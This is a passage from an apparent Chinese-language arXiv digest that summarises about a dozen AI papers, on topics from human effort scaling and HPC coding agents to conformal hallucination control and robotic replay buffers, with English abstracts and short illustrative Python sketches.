Abstract:Generating executable CAD programs from images requires alignment between visual geometry and symbolic program representations, a capability that current methods fail to learn reliably as design complexity increases. Existing fine-tuning approaches rely on either limited supervised datasets or expensive post-training pipelines, resulting in brittle systems that restrict progress in generative CAD design. We argue that the primary bottleneck lies not in model or algorithmic capacity, but in the scarcity of diverse training examples that align visual geometry with program syntax. This limitation is especially acute because the collection of diverse and verified engineering datasets is both expensive and difficult to scale, constraining the development of robust generative CAD models. We introduce Geometric Inference Feedback Tuning (GIFT), a data augmentation framework that leverages geometric feedback to turn test-time compute into a bootstrapped set of high-quality training samples. GIFT combines two mechanisms: Soft-Rejection Sampling (GIFT-REJECT), which retains diverse high-fidelity programs beyond exact ground-truth matches, and Failure-Driven Augmentation (GIFT-FAIL), which converts near-miss predictions into synthetic training examples that improve robustness on challenging geometries. By amortizing inference-time search into the model parameters, GIFT captures the benefits of test-time scaling while reducing inference compute by 80%. It improves mean IoU by 12% over a strong supervised baseline and remains competitive with more complex multimodal systems, without requiring additional human annotation or specialized architectures.
[AI-92] The Novelty Bottleneck: A Framework for Understanding Human Effort Scaling in AI-Assisted Work
【速读】:该论文旨在解决人类与人工智能(AI)协作效率的理论建模问题,特别是揭示在AI辅助任务中人类努力如何随任务规模变化的非直观规律。其核心问题是:为何在许多实际场景中,即使引入高性能AI代理,人类投入仍难以显著低于线性增长?解决方案的关键在于提出一个“新颖性瓶颈”(novelty bottleneck)机制——即任务中需人类判断的“新颖”部分(未被AI先验覆盖)构成不可并行化的串行组件,类似于并行计算中的阿姆达尔定律(Amdahl’s Law)。该模型假设任务可分解为原子决策,其中比例ν为新颖决策,并且规范、验证和纠错成本均随任务规模增长。由此推导出多个反直觉结论,如人类努力无平滑亚线性区间、团队最优规模随AI能力增强而减小等,从而将人类努力的线性标度归因于新颖性分数这一关键参数,而非否定AI效能提升的可能性。
链接: https://arxiv.org/abs/2603.27438
作者: Jacky Liang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:We propose a stylized model of human-AI collaboration that isolates a mechanism we call the novelty bottleneck: the fraction of a task requiring human judgment creates an irreducible serial component analogous to Amdahl’s Law in parallel computing. The model assumes that tasks decompose into atomic decisions, a fraction \nu of which are “novel” (not covered by the agent’s prior), and that specification, verification, and error correction each scale with task size. From these assumptions, we derive several non-obvious consequences: (1) there is no smooth sublinear regime for human effort: it transitions sharply from O(E) to O(1) with no intermediate scaling class; (2) better agents improve the coefficient on human effort but not the exponent; (3) for organizations of n humans with AI agents, optimal team size decreases with agent capability; (4) wall-clock time achieves O(\sqrt{E}) through team parallelism but total human effort remains O(E); and (5) the resulting AI safety profile is asymmetric – AI is bottlenecked on frontier research but unbottlenecked on exploiting existing knowledge. We show these predictions are consistent with empirical observations from AI coding benchmarks, scientific productivity data, and practitioner reports. Our contribution is not a proof that human effort must scale linearly, but a framework that identifies the novelty fraction as the key parameter governing AI-assisted productivity, and derives consequences that clarify – rather than refute – prevalent narratives about intelligence explosions and the “country of geniuses in a data center.”
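该模型的核心标度结论可以用几行代码直观验证:当新颖决策比例 ν > 0 时,人类努力随任务规模 E 线性增长;更强的代理只压低系数而不改变指数。下面是一个假设性的玩具参数化(c_novel、c_overhead 均为示意,非论文原始符号):

```python
def human_effort(E, nu, c_novel=1.0, c_overhead=0.1):
    """新颖性瓶颈模型的简化示意:任务含 E 个原子决策,
    其中比例 nu 为新颖决策,须由人处理;其余由 AI 处理,
    仅产生固定的规范/验证开销 c_overhead。"""
    if nu == 0:
        return c_overhead                     # O(1):无新颖决策
    return c_novel * nu * E + c_overhead      # O(E):系数可降,指数不变

# 更强的代理(更小的 c_novel)只改善系数,不改变线性标度
e1 = human_effort(1000, nu=0.1, c_novel=1.0)
e2 = human_effort(1000, nu=0.1, c_novel=0.5)
```

任务翻倍时努力近似翻倍(ν > 0),而 ν = 0 时努力与规模无关,这正是摘要所说的"无平滑亚线性区间"。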
[AI-93] AstraAI: LLMs, Retrieval and AST-Guided Assistance for HPC Codebases
【速读】:该论文旨在解决高绩效计算(High-Performance Computing, HPC)软件开发中复杂科学代码生成效率低、结构一致性难以保障的问题。解决方案的关键在于构建一个基于命令行接口(Command-Line Interface, CLI)的编码框架 AstraAI,其核心机制是通过检索增强生成(Retrieval-Augmented Generation, RAG)与抽象语法树(Abstract Syntax Tree, AST)结构分析相结合的方式,生成高保真度的提示(prompt),从而引导大语言模型(Large Language Models, LLMs)在理解上下文和代码结构的基础上进行精准的代码生成。该框架能够对源码进行局部修改并保持与周围代码的结构一致性,同时支持本地部署与云端API调用两种模式,确保在HPC环境中的灵活适配与高效执行。
链接: https://arxiv.org/abs/2603.27423
作者: Mahesh Natarajan,Xiaoye Li,Weiqun Zhang
机构: 未知
类目: Artificial Intelligence (cs.AI); Software Engineering (cs.SE)
备注: 10 pages, 5 figures
Abstract:We present AstraAI, a command-line interface (CLI) coding framework for high-performance computing (HPC) software development. AstraAI operates directly within a Linux terminal and integrates large language models (LLMs) with Retrieval-Augmented Generation (RAG) and Abstract Syntax Tree (AST)-based structural analysis to enable context-aware code generation for complex scientific codebases. The central idea is to construct a high-fidelity prompt that is passed to the LLM for inference. This prompt augments the user request with relevant code snippets retrieved from the underlying framework codebase via RAG and structural context extracted from AST analysis, providing the model with precise information about relevant functions, data structures, and overall code organization. The framework is designed to perform scoped modifications to source code while preserving structural consistency with the surrounding code. AstraAI supports both locally hosted models from Hugging Face and API-based frontier models accessible via the American Science Cloud, enabling flexible deployment across HPC environments. The system generates code that aligns with existing project structures and programming patterns. We demonstrate AstraAI on representative HPC code generation tasks within AMReX, a DOE-supported HPC software infrastructure for exascale applications.
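AstraAI 的核心是把 RAG 检索片段与 AST 结构上下文拼装成高保真 prompt。下面用一个假设性的极简函数示意这种组装方式(分节标签、参数名均为本文假设,非 AstraAI 实际实现):

```python
def build_prompt(user_request, rag_snippets, ast_context):
    """AstraAI 式高保真 prompt 组装的示意:
    将 RAG 检索到的相关代码片段与 AST 提取的结构上下文
    置于用户请求之前,供 LLM 推理时参考。"""
    sections = [
        "## Retrieved code snippets",
        *rag_snippets,
        "## Structural context (AST)",
        ast_context,
        "## User request",
        user_request,
    ]
    return "\n".join(sections)

# 假设性的 AMReX 场景示例
prompt = build_prompt(
    "Add a new MultiFab diagnostic",
    ["void WritePlotFile(...) {...}"],
    "class AmrLevel: methods=[advance, post_timestep]",
)
```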
[AI-94] CarbonEdge: Carbon-Aware Deep Learning Inference Framework for Sustainable Edge Computing
【速读】:该论文旨在解决边缘计算环境中深度学习推理任务带来的碳排放增长问题,现有框架虽优化延迟和吞吐量,但忽视了推理工作负载的环境影响。其关键解决方案是提出CarbonEdge框架,通过引入碳足迹估算与绿色调度能力扩展自适应模型分割机制,并设计一种碳效率度量的调度算法,在传统加权评分基础上增加碳效率指标,支持可调性能-碳排放权衡(通过权重扫描验证)。实验表明,CarbonEdge-Green模式相比单体执行可减少22.9%碳排放,碳效率提升1.3倍(从189.5提升至245.8次推理/克CO₂),且调度开销极低(每任务0.03ms),为分布式深度学习推理的可持续部署提供了有效工具。
链接: https://arxiv.org/abs/2603.27420
作者: Guilin Zhang,Wulan Guo,Ziqi Tan,Hailong Jiang
机构: 未知
类目: Distributed, Parallel, and Cluster Computing (cs.DC); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Deep learning applications at the network edge lead to a significant growth in AI-related carbon emissions, presenting a critical sustainability challenge. The existing edge computing frameworks optimize for latency and throughput, but they largely ignore the environmental impact of inference workloads. This paper introduces CarbonEdge, a carbon-aware deep learning inference framework that extends adaptive model partitioning with carbon footprint estimation and green scheduling capabilities. We propose a carbon-aware scheduling algorithm that extends traditional weighted scoring with a carbon efficiency metric, supporting a tunable performance–carbon trade-off (demonstrated via weight sweep). Experimental evaluations on Docker-simulated heterogeneous edge environments show that CarbonEdge-Green mode achieves a 22.9% reduction in carbon emissions compared to monolithic execution. The framework achieves 1.3x improvement in carbon efficiency (245.8 vs 189.5 inferences per gram CO2) with negligible scheduling overhead (0.03ms per task). These results highlight the framework’s potential for sustainable edge AI deployment, providing researchers and practitioners a tool to quantify and minimize the environmental footprint of distributed deep learning inference.
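摘要所述"在传统加权评分上叠加碳效率项、可调性能-碳排放权衡"可以用一个假设性打分函数示意(归一化方式与权重形式均为本文假设,非 CarbonEdge 原始公式;碳效率数值取自摘要中的 245.8 与 189.5):

```python
def node_score(latency_ms, throughput, carbon_eff, w_perf=0.5, w_carbon=0.5):
    """CarbonEdge 式调度打分的简化示意:
    在玩具性能分上叠加碳效率项(每克 CO2 的推理次数),
    w_carbon 可调,实现性能与排放之间的权衡(即权重扫描)。"""
    perf = throughput / (1.0 + latency_ms)
    return w_perf * perf + w_carbon * carbon_eff

node_a = dict(latency_ms=10, throughput=100, carbon_eff=189.5)  # 快但碳效率低
node_b = dict(latency_ms=20, throughput=100, carbon_eff=245.8)  # 慢但碳效率高
# 偏绿色的权重下,高碳效率节点胜出
green = node_score(**node_b, w_perf=0.1, w_carbon=0.9) > node_score(**node_a, w_perf=0.1, w_carbon=0.9)
```

将 w_carbon 从 0 扫到 1,即可复现摘要中"可调权衡"的行为:纯性能权重下选 node_a,绿色权重下选 node_b。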
[AI-95] Agent-Driven Autonomous Reinforcement Learning Research: Iterative Policy Improvement for Quadruped Locomotion
【速读】:该论文旨在解决机器人强化学习(Reinforcement Learning, RL)研究中迭代实验流程高度依赖人工干预的问题,特别是在四足动物运动控制(quadruped locomotion)这一复杂、易出错的场景下,如何实现更自主的研究执行。其关键解决方案是引入一个代理驱动的自治强化学习框架,在人类提供高层次指令的前提下,由智能体(agent)自主完成从代码读取、故障诊断、奖励函数与地形配置调整、任务调度与监控、中间指标分析到下一波实验提案的完整闭环流程。该方法在Isaac Lab仿真环境中对DHAV1 12-DoF四足机器人进行了超过70次实验验证,展示了代理能够在多GPU环境下独立执行RL研究循环,并做出具有实际意义的决策(如识别PhysX死锁源、修正环境导入问题、优化奖励结构等),从而显著降低人力投入并提升研究效率。
链接: https://arxiv.org/abs/2603.27416
作者: Nimesh Khandelwal,Shakti S. Gupta
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:This paper documents a case study in agent-driven autonomous reinforcement learning research for quadruped locomotion. The setting was not a fully self-starting research system. A human provided high-level directives through an agentic coding environment, while an agent carried out most of the execution loop: reading code, diagnosing failures, editing reward and terrain configurations, launching and monitoring jobs, analyzing intermediate metrics, and proposing the next wave of experiments. Across more than 70 experiments organized into fourteen waves on a DHAV1 12-DoF quadruped in Isaac Lab, the agent progressed from early rough-terrain runs with mean reward around 7 to a best logged Wave 12 run, exp063, with velocity error 0.263 and 97% timeout over 2000 iterations, independently reproduced five times across different GPUs. The archive also records several concrete autonomous research decisions: isolating PhysX deadlocks to terrain sets containing boxes and stair-like primitives, porting four reward terms from openly available reference implementations [deeprobotics, rlsar], correcting Isaac Sim import and bootstrapping issues, reducing environment count for diagnosis, terminating hung runs, and pivoting effort away from HIM after repeated terrain=0.0 outcomes. Relative to the AutoResearch paradigm [autoresearch], this case study operates in a more failure-prone robotics RL setting with multi-GPU experiment management and simulator-specific engineering constraints. The contribution is empirical and documentary: it shows that an agent can materially execute the iterative RL research loop in this domain with limited human intervention, while also making clear where human direction still shaped the agenda.
[AI-96] Greedy Is a Strong Default: Agents as Iterative Optimizers
【速读】:该论文旨在解决传统优化算法中随机扰动生成候选解效率低、难以有效利用任务先验知识的问题。其核心挑战在于:当优化器的提案机制由随机扰动替换为具备推理能力的大语言模型(LLM)代理时,经典优化框架是否依然有效?解决方案的关键在于引入一个基于LLM的智能提案器,该代理能够结合评估诊断信息生成有指导性的候选解,从而替代传统随机扰动策略。实验表明,在多个离散、混合和连续搜索空间的任务上(如乳腺癌分类、MobileNetV3超参数优化、LoRA微调、XGBoost调参),仅使用贪心爬山法(greedy hill climbing)配合早期停止策略即可获得与复杂算法相当甚至更优的性能,且显著减少评估次数。这说明LLM所学习到的先验知识足够强大,使得接受规则的复杂性对最终结果影响有限,凸显了“简单即有效”的实践价值。
链接: https://arxiv.org/abs/2603.27415
作者: Yitao Li
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation (stat.CO)
备注:
Abstract:Classical optimization algorithms–hill climbing, simulated annealing, population-based methods–generate candidate solutions via random perturbations. We replace the random proposal generator with an LLM agent that reasons about evaluation diagnostics to propose informed candidates, and ask: does the classical optimization machinery still help when the proposer is no longer random? We evaluate on four tasks spanning discrete, mixed, and continuous search spaces (all replicated across 3 independent runs): rule-based classification on Breast Cancer (test accuracy 86.0% to 96.5%), mixed hyperparameter optimization for MobileNetV3-Small on STL-10 (84.5% to 85.8%, zero catastrophic failures vs. 60% for random search), LoRA fine-tuning of Qwen2.5-0.5B on SST-2 (89.5% to 92.7%, matching Optuna TPE with 2x efficiency), and XGBoost on Adult Census (AUC 0.9297 to 0.9317, tying CMA-ES with 3x fewer evaluations). Empirically, on these tasks: a cross-task ablation shows that simulated annealing, parallel investigators, and even a second LLM model (OpenAI Codex) provide no benefit over greedy hill climbing while requiring 2-3x more evaluations. In our setting, the LLM’s learned prior appears strong enough that acceptance-rule sophistication has limited impact–round 1 alone delivers the majority of improvement, and variants converge to similar configurations across strategies. The practical implication is surprising simplicity: greedy hill climbing with early stopping is a strong default. Beyond accuracy, the framework produces human-interpretable artifacts–the discovered cancer classification rules independently recapitulate established cytopathology principles.
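论文的核心结论是"贪心爬山 + 早停"已是强默认策略。下面是该循环的极简示意:真实系统中 `propose` 由 LLM 结合评估诊断生成候选,此处为保持自包含而用普通函数代替(玩具目标函数与步长均为本文假设):

```python
def greedy_hill_climb(init, propose, evaluate, max_rounds=20, patience=3):
    """贪心爬山 + 早停的极简示意。
    propose(best, score) 在论文设定中由 LLM 代理生成有指导性的候选;
    贪心规则:只接受严格改进,连续 patience 次无改进则早停。"""
    best, best_score = init, evaluate(init)
    stall = 0
    for _ in range(max_rounds):
        cand = propose(best, best_score)
        score = evaluate(cand)
        if score > best_score:
            best, best_score, stall = cand, score, 0
        else:
            stall += 1
            if stall >= patience:
                break
    return best, best_score

# 玩具任务:最大化 -(x-3)^2,提议器每次向右走 0.5
best, score = greedy_hill_climb(
    init=0.0,
    propose=lambda x, s: x + 0.5,
    evaluate=lambda x: -(x - 3.0) ** 2,
)
```

摘要中的消融正是在这个骨架上对比了模拟退火、并行探索者等更复杂的接受规则,发现它们并未带来额外收益。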
[AI-97] The Hidden Costs of AI-Mediated Political Outreach: Persuasion and AI Penalties in the US and UK
【速读】:该论文旨在解决人工智能(Artificial Intelligence, AI)赋能的系统在政治竞选传播中日益普及背景下,公众如何评价此类沟通方式及其潜在后果这一关键问题。现有研究多聚焦于强制性接触下态度变化,忽视了人们对AI中介传播合法性的认知。论文通过在美国和英国开展的预注册2×2实验(每国N=1,800),操控传播意图(信息型 vs. 说服型)与互动主体类型(人类 vs. AI中介),考察高重要性政治议题情境下的评价差异。其核心发现为两类“评价惩罚”:一是“说服惩罚”,即说服型传播无论是否由AI执行均被视作更具威胁性、更低效且损害组织信任;二是“AI惩罚”,表现为AI中介传播引发规范性担忧,导致在五项指标上均呈现负面评价。这表明,公众对AI传播的接受度不仅取决于其效果,更受其合法性感知和人际沟通规范的影响,这对民主沟通具有重要意义。
链接: https://arxiv.org/abs/2603.27413
作者: Andreas Jungherr,Adrian Rauchfleisch
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注:
Abstract:As AI-enabled systems become available for political campaign outreach, an important question has received little empirical attention: how do people evaluate the communicative practices these systems represent, and what consequences do those evaluations carry? Most research on AI-enabled persuasion examines attitude change under enforced exposure, leaving aside whether people regard AI-mediated outreach as legitimate or not. We address this gap with a preregistered 2x2 experiment conducted in the United States and United Kingdom (N = 1,800 per country) varying outreach intent (informational vs. persuasive) and type of interaction partner (human vs. AI-mediated) in the context of political issues that respondents consider highly important. We find consistent evidence for two evaluation penalties. A persuasion penalty emerges across nearly all outcomes in both countries: explicitly persuasive outreach is evaluated as less acceptable, more threatening to personal autonomy, less beneficial, and more damaging to organizational trust than informational outreach, consistent with reactance to perceived threats to attitudinal freedom. An AI penalty is consistent with a distinct mechanism: AI-mediated outreach triggers normative concerns about appropriate communicative agents, producing similarly negative evaluations across five outcomes in both countries. As automated outreach becomes more widespread, how people judge it may matter for democratic communication just as much as whether it changes minds.
[AI-98] On the Relationship between Bayesian Networks and Probabilistic Structural Causal Models
【速读】:该论文旨在解决概率图模型(特别是贝叶斯网络)与结构因果模型(Structural Causal Models, SCMs)之间的映射问题,即如何将基于专家知识或数据学习得到的贝叶斯网络转化为具有因果语义的概率结构因果模型,并探讨这种转换对网络结构和概率分布的影响。解决方案的关键在于利用线性代数和线性规划方法实现这一转化,并通过分析模型维度来研究解的存在性和唯一性条件,从而确保转换过程在数学上严谨且可操作。
链接: https://arxiv.org/abs/2603.27406
作者: Peter J.F. Lucas,Eleanora Zullo,Fabio Stella
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:In this paper, the relationship between probabilistic graphical models, in particular Bayesian networks, and causal diagrams, also called structural causal models, is studied. Structural causal models are deterministic models, based on structural equations or functions, that can be provided with uncertainty by adding independent, unobserved random variables to the models, equipped with probability distributions. One question that arises is whether a Bayesian network that has been obtained from expert knowledge or learnt from data can be mapped to a probabilistic structural causal model, and whether or not this has consequences for the network structure and probability distribution. We show that linear algebra and linear programming offer key methods for the transformation, and examine properties for the existence and uniqueness of solutions based on dimensions of the probabilistic structural model. Finally, we examine in what way the semantics of the models is affected by this transformation. Keywords: Causality, probabilistic structural causal models, Bayesian networks, linear algebra, experimental software.
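贝叶斯网络节点到概率结构因果模型的一种常见构造,是把每个条件概率表(CPT)改写为带独立均匀噪声的结构函数。下面的草图只演示这种标准构造,用以直观说明"BN 可映射为 SCM"的含义;论文讨论的线性代数/线性规划解法及其解的唯一性分析更一般:

```python
import random

def scm_function(cpt):
    """将二值贝叶斯网络节点的 CPT 映射为结构因果模型函数:
    X = f(pa, U) = 1 当 U < P(X=1 | pa),其中 U ~ Uniform(0,1)。
    该构造保持给定父节点取值下 X 的边际分布不变。"""
    def f(parents, u):
        return 1 if u < cpt[parents] else 0
    return f

# 节点 X,父节点 Y:P(X=1|Y=0)=0.2,P(X=1|Y=1)=0.9
f = scm_function({(0,): 0.2, (1,): 0.9})
random.seed(0)
samples = [f((1,), random.random()) for _ in range(10000)]
freq = sum(samples) / len(samples)   # 应接近 0.9
```

对每个节点施加同样的构造即得到一个与原 BN 分布一致的概率 SCM;论文进一步刻画了此类映射在何种维度条件下存在且唯一。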
[AI-99] Conditional Factuality Controlled LLM s with Generalization Certificates via Conformal Sampling CVPR2026
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在测试时对幻觉(hallucination)缺乏可靠控制的问题。现有基于 conformal prediction(CP)的方法通常仅提供边际覆盖保证(marginal guarantees),并依赖单一全局阈值,导致对困难提示覆盖不足、对简单提示过度覆盖,且预测集合过大。其解决方案的关键在于提出一种后处理的条件事实性控制框架(Conditional Factuality Control, CFC),通过在潜在“成功”得分上进行增强分位数回归(augmented quantile regression),定义一个连续的、特征条件化的接受阈值,并在推理时采用固定点阈值规则进行部署。理论分析表明,在交换性假设下,CFC可实现条件覆盖保证(conditional coverage guarantee),且在得分分布满足弱假设时,相比边际CP方法具有更高的样本效率;进一步提出的CFC-PAC变体通过稳定性边界调整名义风险水平,提供有限样本下条件误覆盖偏差不超过 O(√(log(1/δ)/N)) 的概率保证。实验验证了CFC及其变体在合成数据、真实世界推理与问答基准及Flickr8k视觉-语言模型(VLM)场景中均能实现接近目标覆盖率的同时显著缩小预测集合规模。
链接: https://arxiv.org/abs/2603.27403
作者: Kai Ye,Qingtao Pan,Shuo Li
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: CVPR 2026
Abstract:Large language models (LLMs) need reliable test-time control of hallucinations. Existing conformal methods for LLMs typically provide only marginal guarantees and rely on a single global threshold, which can under-cover hard prompts, over-cover easy ones, and produce oversized prediction sets. We propose Conditional Factuality Control (CFC), a post-hoc conformal framework that returns set-valued outputs with conditional coverage guarantees. CFC defines a continuous, feature-conditional acceptance threshold through augmented quantile regression on a latent “success” score, and deploys it through a fixed-point threshold rule at inference time. Theoretically, we show that CFC satisfies a conditional coverage guarantee under exchangeability and analyze its efficiency, proving that, under mild assumptions on the score distributions, the conditional rule is strictly more sample-efficient than marginal conformal prediction at the same target coverage. We further derive a PAC-style variant, CFC-PAC, which shrinks the nominal risk level based on a stability bound, yielding a finite-sample certificate that the conditional miscoverage deviates from the target by at most O(\sqrt{\log(1/\delta)/N}). Empirically, on synthetic data, real-world reasoning and QA benchmarks, and a Flickr8k VLM setting, CFC and CFC-PAC consistently attain near-target coverage across difficulty groups while using smaller prediction sets than CP and non-CP baselines.
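CFC-PAC 的名义风险收缩与标准 split-conformal 阈值可以用几行代码示意(收缩常数 c 与分位规则均为标准教科书形式的假设性草图,并非论文的条件化版本):

```python
import math

def pac_adjusted_level(alpha, N, delta, c=1.0):
    """CFC-PAC 式名义风险收缩的示意:
    alpha' = alpha - c * sqrt(log(1/delta) / N)。
    校准集越大,alpha' 越接近名义水平;校准集过小时可能收缩到 0(证书退化)。"""
    return max(0.0, alpha - c * math.sqrt(math.log(1.0 / delta) / N))

def conformal_threshold(scores, alpha):
    """边际 split-conformal 阈值:取校准分数的第 ceil((N+1)(1-alpha)) 个次序统计量。"""
    s = sorted(scores)
    n = len(s)
    k = min(n - 1, math.ceil((n + 1) * (1.0 - alpha)) - 1)
    return s[k]

alpha_small = pac_adjusted_level(0.1, N=100, delta=0.05)    # 小样本:收缩到 0
alpha_big = pac_adjusted_level(0.1, N=10000, delta=0.05)    # 大样本:接近 0.1
```

论文的贡献在于把这里的单一全局阈值替换为特征条件化的阈值函数,并证明其在同等目标覆盖下更省样本。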
[AI-100] Diagnosing Non-Markovian Observations in Reinforcement Learning via Prediction-Based Violation Scoring
【速读】:该论文旨在解决强化学习算法在实际应用中因观测不满足马尔可夫性质(Markov property)而导致性能下降的问题,尤其是当传感器存在相关噪声、延迟或部分可观测性时,传统评估指标无法区分此类非马尔可夫结构与其它次优来源。其解决方案的关键在于提出一种基于预测的评分方法:首先利用随机森林模型去除观测中的非线性马尔可夫兼容动态,随后通过岭回归检验历史观测是否能进一步降低残差预测误差,从而量化观测轨迹中的非马尔可夫程度;该得分范围为[0,1],无需构建因果图,且在多个环境和算法设置下验证了其对噪声强度的单调敏感性及指导网络架构选择的实际价值。
链接: https://arxiv.org/abs/2603.27389
作者: Naveen Mysore
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注: 15 pages, 3 figures, 5 tables. Under review at RLC 2026
Abstract:Reinforcement learning algorithms assume that observations satisfy the Markov property, yet real-world sensors frequently violate this assumption through correlated noise, latency, or partial observability. Standard performance metrics conflate Markov breakdowns with other sources of suboptimality, leaving practitioners without diagnostic tools for such violations. This paper introduces a prediction-based scoring method that quantifies non-Markovian structure in observation trajectories. A random forest first removes nonlinear Markov-compliant dynamics; ridge regression then tests whether historical observations reduce prediction error on the residuals beyond what the current observation provides. The resulting score is bounded in [0, 1] and requires no causal graph construction. Evaluation spans six environments (CartPole, Pendulum, Acrobot, HalfCheetah, Hopper, Walker2d), three algorithms (PPO, A2C, SAC), controlled AR(1) noise at six intensity levels, and 10 seeds per condition. In post-hoc detection, 7 of 16 environment-algorithm pairs, primarily high-dimensional locomotion tasks, show significant positive monotonicity between noise intensity and the violation score (Spearman rho up to 0.78, confirmed under repeated-measures analysis); under training-time noise, 13 of 16 pairs exhibit statistically significant reward degradation. An inversion phenomenon is documented in low-dimensional environments where the random forest absorbs the noise signal, causing the score to decrease as true violations grow, a failure mode analyzed in detail. A practical utility experiment demonstrates that the proposed score correctly identifies partial observability and guides architecture selection, fully recovering performance lost to non-Markovian observations. Source code to reproduce all results is provided at this https URL.
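两阶段评分的骨架可以自包含地示意如下。为避免引入随机森林依赖,第一阶段用线性回归代替论文中的非线性模型(这是本草图的假设性简化);第二阶段与论文一致,用岭回归检验历史观测能否进一步降低残差误差:

```python
import numpy as np

def ridge_fit_predict(X, y, lam=1e-2):
    """岭回归闭式解(带截距项)。"""
    Xb = np.hstack([X, np.ones((len(X), 1))])
    w = np.linalg.solve(Xb.T @ Xb + lam * np.eye(Xb.shape[1]), Xb.T @ y)
    return Xb @ w

def violation_score(obs, lag=1):
    """非马尔可夫违背评分的简化示意:
    1) 用 o_t 预测 o_{t+1},取残差(论文此阶段为随机森林);
    2) 用 o_{t-lag} 预测残差,误差再降低的相对比例即为评分,截断到 [0,1]。"""
    x_now = obs[lag:-1].reshape(-1, 1)
    x_past = obs[:-1 - lag].reshape(-1, 1)
    y = obs[lag + 1:]
    resid = y - ridge_fit_predict(x_now, y)
    e0 = np.mean(resid ** 2)
    e1 = np.mean((resid - ridge_fit_predict(x_past, resid)) ** 2)
    return float(np.clip((e0 - e1) / (e0 + 1e-12), 0.0, 1.0))

rng = np.random.default_rng(0)
markov = rng.standard_normal(2000)        # 白噪声:近似马尔可夫,评分应接近 0
e = rng.standard_normal(2001)
ma1 = e[1:] + 0.9 * e[:-1]                # MA(1) 相关噪声:历史有额外预测力
score_markov = violation_score(markov)
score_ma1 = violation_score(ma1)
```

相关噪声序列的评分高于白噪声序列,对应论文中评分随噪声强度单调上升的(理想)行为。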
[AI-101] Defend: Automated Rebuttals for Peer Review with Minimal Author Guidance
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在自动生成学术论文反驳文本(rebuttal generation)时,常因缺乏结构化推理和事实准确性而导致反驳内容偏离核心问题、逻辑不严密的问题。其关键解决方案是提出DEFEND工具,该工具通过显式执行自动化反驳生成的推理流程,并保持作者在环(author-in-the-loop),使作者仅需以最小干预驱动推理过程,从而显著提升反驳的针对性与事实正确性,同时降低认知负荷。实验结果表明,相较于直接生成、分段生成及无作者介入的序列方法,DEFEND在事实准确性和反驳强度上均有显著改进。
链接: https://arxiv.org/abs/2603.27360
作者: Jyotsana Khatri,Manasi Patwardhan
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Rebuttal generation is a critical component of the peer review process for scientific papers, enabling authors to clarify misunderstandings, correct factual inaccuracies, and guide reviewers toward a more accurate evaluation. We observe that Large Language Models (LLMs) often struggle to perform targeted refutation and maintain accurate factual grounding when used directly for rebuttal generation, highlighting the need for structured reasoning and author intervention. To address this, in the paper, we introduce DEFEND an LLM based tool designed to explicitly execute the underlying reasoning process of automated rebuttal generation, while keeping the author-in-the-loop. As opposed to writing the rebuttals from scratch, the author needs to only drive the reasoning process with minimal intervention, leading an efficient approach with minimal effort and less cognitive load. We compare DEFEND against three other paradigms: (i) Direct rebuttal generation using LLM (DRG), (ii) Segment-wise rebuttal generation using LLM (SWRG), and (iii) Sequential approach (SA) of segment-wise rebuttal generation without author intervention. To enable finegrained evaluation, we extend the ReviewCritique dataset, creating review segmentation, deficiency, error type annotations, rebuttal-action labels, and mapping to gold rebuttal segments. Experimental results and a user study demonstrate that directly using LLMs perform poorly in factual correctness and targeted refutation. Segment-wise generation and the automated sequential approach with author-in-the-loop, substantially improve factual correctness and strength of refutation.
[AI-102] D-SPEAR: Dual-Stream Prioritized Experience Adaptive Replay for Stable Reinforcement Learning in Robotic Manipulation
【速读】:该论文旨在解决强化学习在机器人操作任务中因接触丰富动力学、长时序和训练不稳定性导致的性能下降问题,尤其是传统离策略演员-评论家算法(如SAC和TD3)在真实场景下出现策略振荡和性能崩溃的现象。其关键解决方案是提出D-SPEAR:一种双流优先经验自适应回放机制,通过解耦演员和评论家的采样策略,在共享的经验回放缓冲区中分别优化不同目标——评论家采用优先级经验回放以高效学习价值函数,而演员则基于低误差样本更新以稳定策略优化;同时引入基于TD误差变异系数的自适应锚点机制平衡均匀与优先采样,并采用Huber损失函数增强对异构奖励尺度的鲁棒性,从而显著提升训练稳定性和最终性能。
链接: https://arxiv.org/abs/2603.27346
作者: Yu Zhang,Karl Mason
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Accepted at IEEE 11th International Conference on Control and Robotics Engineering (ICCRE 2026)
Abstract:Robotic manipulation remains challenging for reinforcement learning due to contact-rich dynamics, long horizons, and training instability. Although off-policy actor-critic algorithms such as SAC and TD3 perform well in simulation, they often suffer from policy oscillations and performance collapse in realistic settings, partly due to experience replay strategies that ignore the differing data requirements of the actor and the critic. We propose D-SPEAR: Dual-Stream Prioritized Experience Adaptive Replay, a replay framework that decouples actor and critic sampling while maintaining a shared replay buffer. The critic leverages prioritized replay for efficient value learning, whereas the actor is updated using low-error transitions to stabilize policy optimization. An adaptive anchor mechanism balances uniform and prioritized sampling based on the coefficient of variation of TD errors, and a Huber-based critic objective further improves robustness under heterogeneous reward scales. We evaluate D-SPEAR on challenging robotic manipulation tasks from the robosuite benchmark, including Block-Lifting and Door-Opening. Results demonstrate that D-SPEAR consistently outperforms strong off-policy baselines, including SAC, TD3, and DDPG, in both final performance and training stability, with ablation studies confirming the complementary roles of the actor-side and critic-side replay streams.
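"基于 TD 误差变异系数的自适应锚点"可以用一个假设性草图示意:CV 越大(误差越不均匀)越偏向优先采样,CV 越小越接近均匀采样。CV 到混合权重的映射形式为本文假设,非论文原始公式:

```python
import numpy as np

def adaptive_anchor(td_errors, cv_ref=1.0):
    """TD 误差变异系数 -> 混合权重的示意映射:
    anchor = CV / (CV + cv_ref),落在 [0, 1) 区间。"""
    cv = np.std(td_errors) / (np.abs(np.mean(td_errors)) + 1e-8)
    return float(cv / (cv + cv_ref))

def sample_probs(td_errors, anchor, alpha=0.6):
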